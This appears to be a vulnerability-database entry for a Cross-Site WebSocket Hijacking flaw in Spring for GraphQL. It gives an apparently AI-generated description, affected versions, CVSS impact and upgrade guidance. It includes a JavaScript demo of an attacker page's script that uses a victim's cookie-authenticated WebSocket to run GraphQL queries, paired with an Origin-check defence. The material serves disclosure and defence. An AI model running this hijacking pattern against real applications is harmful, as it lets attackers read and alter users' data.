CVE-2026-41700
Description
Spring for GraphQL WebSocket transport is vulnerable to Cross-Site WebSocket Hijacking, allowing an attacker to execute arbitrary GraphQL operations with the victim's credentials.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Spring for GraphQL applications that have enabled the WebSocket transport are vulnerable to Cross-Site WebSocket Hijacking. The vulnerability affects versions 2.0.0 through 2.0.3, 1.4.0 through 1.4.5, 1.3.0 through 1.3.8, and 1.0.0 through 1.0.6. The application is vulnerable when it has enabled the GraphQL WebSocket transport, relies on cookie-based session authentication, and does not have custom Spring Security WebSocket-level Origin enforcement configured [1].
Exploitation
An attacker lures an authenticated user to a page under the attacker's control. Script on that page opens a WebSocket connection to the vulnerable Spring for GraphQL endpoint. Because the browser attaches the victim's session cookie to the WebSocket handshake regardless of which origin the page was loaded from, and the server does not check the Origin header of the handshake, the connection is authenticated as the victim. The attacker's script can then send arbitrary GraphQL operations over the connection and read the responses, without ever holding the victim's credentials [1].
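The following is an added example; it is not code from the Spring for GraphQL project or from the advisory. It models both halves of the attack described above and the exposure condition from the Vulnerability section: the attacker page's script driving the graphql-transport-ws protocol (connection_init, connection_ack, subscribe, next, complete, the protocol Spring for GraphQL's WebSocket transport implements) over a connection the browser authenticated with the victim's cookie, and a handshake-time Origin check of the kind the advisory lists as making an application not exposed. The host names, session cookie, query, allowlist and the fake server socket are all constructed for the demo.

```javascript
// Added example, not code from the Spring for GraphQL project or the advisory.
// Models a Cross-Site WebSocket Hijacking attempt against a GraphQL endpoint
// speaking graphql-transport-ws, plus the handshake-time Origin check that
// stops it. Hosts, cookie, query and allowlist are constructed for the demo.

const VICTIM_WS_URL = 'wss://app.victim.example/graphql';
const ATTACKER_ORIGIN = 'https://attacker.example';
const APP_ORIGIN = 'https://app.victim.example';

// ---- attacker side: what a page on attacker.example runs -----------------
// Drives the protocol over any WebSocket-like object. The script never holds
// the victim's cookie; the browser attaches it to the handshake on its own,
// and the script only ever sees the query results that come back.
class HijackClient {
  constructor(query) {
    this.query = query;
    this.results = [];
    this.finished = false;
  }
  attach(ws) {
    ws.onopen = () => ws.send(JSON.stringify({ type: 'connection_init', payload: {} }));
    ws.onmessage = (ev) => {
      const msg = JSON.parse(ev.data);
      if (msg.type === 'connection_ack') {
        ws.send(JSON.stringify({ id: '1', type: 'subscribe', payload: { query: this.query } }));
      } else if (msg.type === 'next') {
        this.results.push(msg.payload);
      } else if (msg.type === 'complete' || msg.type === 'error') {
        this.finished = true;
      }
    };
    ws.onerror = () => { this.finished = true; };
    return this;
  }
}
// In a real browser the attacker page would run:
//   new HijackClient('{ me { email } }')
//     .attach(new WebSocket(VICTIM_WS_URL, 'graphql-transport-ws'));

// ---- server side: handshake-time Origin enforcement ----------------------
// The advisory's exposure condition is cookie sessions plus no Origin check on
// the WebSocket handshake; allowedOrigins === null models that unenforced state.
function acceptHandshake(headers, allowedOrigins) {
  if (allowedOrigins === null) return true;      // vulnerable: any origin accepted
  const origin = headers.origin;
  if (typeof origin !== 'string') return false;  // browsers always send Origin; refuse if absent
  return allowedOrigins.includes(origin);
}

// ---- simulation: browser handshake + minimal authenticated server ---------
// The handshake a browser sends when a page at pageOrigin opens a socket to
// app.victim.example: the cookie for that host rides along whatever origin
// ran the script.
function browserHandshake(pageOrigin, sessionId) {
  return {
    host: 'app.victim.example',
    origin: pageOrigin,
    cookie: `JSESSIONID=${sessionId}`,
    'sec-websocket-protocol': 'graphql-transport-ws',
  };
}

// Fake socket (constructed for the demo) that applies acceptHandshake and, if
// accepted, answers the protocol as the cookie's authenticated session would.
class FakeServerSocket {
  constructor(handshake, allowedOrigins, dataForSession) {
    this.accepted = acceptHandshake(handshake, allowedOrigins);
    this.data = dataForSession;
  }
  open() {
    if (this.accepted) this.onopen(); else this.onerror(new Error('handshake rejected'));
  }
  send(raw) {
    const msg = JSON.parse(raw);
    const reply = (m) => this.onmessage({ data: JSON.stringify(m) });
    if (msg.type === 'connection_init') reply({ type: 'connection_ack' });
    if (msg.type === 'subscribe') {
      reply({ id: msg.id, type: 'next', payload: { data: this.data } });
      reply({ id: msg.id, type: 'complete' });
    }
  }
}

// One attempt from a page at pageOrigin against a server configured with
// allowedOrigins; returns the data the attacker's script obtained, or null.
function runAttempt(pageOrigin, allowedOrigins) {
  const victimData = { me: { email: 'victim@victim.example' } };
  const hs = browserHandshake(pageOrigin, 'victim-session-id');
  const ws = new FakeServerSocket(hs, allowedOrigins, victimData);
  const client = new HijackClient('{ me { email } }').attach(ws);
  ws.open();
  return client.results.length ? client.results[0].data : null;
}
```

With `allowedOrigins` set to `null` (no enforcement) the attempt from `attacker.example` returns the victim's data; with an allowlist containing only the application's own origin the handshake is refused and the script obtains nothing, while the same query from the application's origin still succeeds. Enforcement has to happen at the handshake, since once the upgrade completes the server has no further chance to tell the attacker's page from the application's own.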
Impact
A successful Cross-Site WebSocket Hijacking attack enables the attacker to execute arbitrary GraphQL operations with the victim's credentials. This can lead to unauthorized data access (confidentiality breach) and unauthorized modification or deletion of data (integrity breach). The CVSS v3.1 base score is 8.1 (High) with a vector of AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N [1].
Mitigation
Users of affected versions should upgrade to the corresponding fixed version: 2.0.x to 2.0.4, 1.4.x to 1.4.6, 1.3.x to 1.3.9 (commercial), and 1.0.x to 1.0.7 (commercial). Once upgraded, no further mitigation steps are necessary [1]. Applications that already enforce the Origin header at the WebSocket handshake through Spring Security meet the advisory's exclusion condition and are not exposed; a deployment that cannot upgrade immediately can apply that configuration until it does.
AI Insight generated on Jun 11, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: >=2.0.0,<=2.0.3
- Range: 1.0.0-1.0.6, 1.3.0-1.3.8, 1.4.0-1.4.5, 2.0.0-2.0.3
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
News mentions
No linked articles in our index yet.